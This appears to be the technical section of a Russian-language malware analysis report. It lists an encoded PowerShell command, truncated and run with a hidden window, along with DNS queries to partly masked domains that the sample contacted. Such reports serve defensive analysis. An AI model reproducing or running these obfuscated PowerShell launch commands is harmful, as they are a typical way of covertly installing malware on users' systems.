Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABLAGcAeABoAHIAYQByAGYAawB2AHIAegA9ACcARwBhAG0AbQB4AHUAaQBuACcAOwAkAFcAZgBwAHgAeABrAG4AZgAgAD0AIAAnAD...
- DNS ASK ar###tock.com
- DNS ASK dd###angrur.com
- DNS ASK rb##ort.com
- DNS ASK bo###ritime.com
- DNS ASK to####tnessperu.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABLAGcAeABoAHIAYQByAGYAawB2AHIAegA9ACcARwBhAG0AbQB4AHUAaQBuACcAOwAkAFcAZgBwAHgAeABrAG4AZgAgAD0AIAAnAD...' (со скрытым окном)